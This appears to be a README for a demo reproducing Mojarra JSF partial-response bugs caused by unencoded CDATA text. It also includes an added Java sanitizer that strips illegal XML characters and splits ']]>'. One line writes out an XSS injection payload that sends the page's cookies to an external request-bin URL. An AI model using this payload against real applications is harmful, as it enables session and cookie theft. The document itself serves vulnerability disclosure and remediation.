mojarra-ajax

Minimal demo to reproduce some issues with mojarra partial update.


To reproduce, run

mvn package wildfly:run

and wait for the server to start up.

Open the URL http://localhost:8080/ajax/index.xhtml.

It also works for user-supplied input: open http://localhost:8080/ajax/input.xhtml and enter the \u000C character into the input field.

A workaround is available at https://github.com/cnsgithub/mojarra-ajax/blob/master/src/main/java/main/IllegalXmlCharactersFilter.java.

Pull request eclipse-ee4j/mojarra#4517 has been closed unmerged.

Open the URL http://localhost:8080/ajax/issue4392.xhtml, enter ]]> and click the button to see the XML parser crash (denial of service).

However, this vulnerability might also be used to inject arbitrary JavaScript (XSS). Just enter ]]></update><eval><![CDATA[window.open("https://postb.in/Lsmfz95D?cookie="+encodeURIComponent(document.cookie));]]></eval><update><![CDATA[ and see how your cookies are sent to https://postb.in/b/Lsmfz95D.
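
Both problems above (the \u000C character and the ]]> sequence) come from writing text into a CDATA section of the partial response without encoding it. The following is an added example, not code from this repository's workaround filter or from Mojarra: the class and method names are hypothetical and the sample strings are constructed. It drops code points that XML 1.0 does not allow and splits every ]]> so that it cannot close the section early.

```java
/** Added example: hypothetical helper, not Mojarra's or this repository's code. */
public final class PartialResponseCdata {

    private PartialResponseCdata() {}

    /** True if the code point matches the XML 1.0 "Char" production. */
    static boolean isLegalXmlChar(int cp) {
        return cp == 0x9 || cp == 0xA || cp == 0xD
            || (cp >= 0x20 && cp <= 0xD7FF)
            || (cp >= 0xE000 && cp <= 0xFFFD)
            || (cp >= 0x10000 && cp <= 0x10FFFF);
    }

    /** Returns text that is safe to place between <![CDATA[ and ]]>. */
    static String sanitize(String text) {
        StringBuilder out = new StringBuilder(text.length());
        // Iterate by code point so valid surrogate pairs survive and
        // unpaired surrogates (illegal in XML) are dropped.
        for (int i = 0; i < text.length(); ) {
            int cp = text.codePointAt(i);
            i += Character.charCount(cp);
            if (isLegalXmlChar(cp)) {
                out.appendCodePoint(cp);
            }
        }
        // Split the terminator AFTER stripping: "]]\u000C>" only becomes
        // "]]>" once the form feed is gone. The "]]" stays in the current
        // section and the ">" starts a new one, so the parser sees the
        // original text and never an early end of the section.
        return out.toString().replace("]]>", "]]]]><![CDATA[>");
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the update id "form" is a placeholder.
        String[] samples = { "page\u000Cbreak", "a]]>b", "]]\u000C>" };
        for (String s : samples) {
            System.out.println(
                "<update id=\"form\"><![CDATA[" + sanitize(s) + "]]></update>");
        }
    }
}
```

With this in place, a value such as a]]>b is written as a]]]]><![CDATA[>b, which a conforming parser reads back as the original five characters inside the same update element.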